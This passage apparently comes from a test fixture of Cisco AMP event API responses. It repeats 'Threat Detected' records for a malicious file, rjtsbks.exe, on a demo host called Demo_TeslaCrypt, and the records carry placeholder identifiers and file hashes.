Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163565","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":67000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163564","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":20000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163563","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":833000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196265","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":818000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196264","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196263","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":693000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":630000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196260","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":584000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":443000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196258","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196257","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
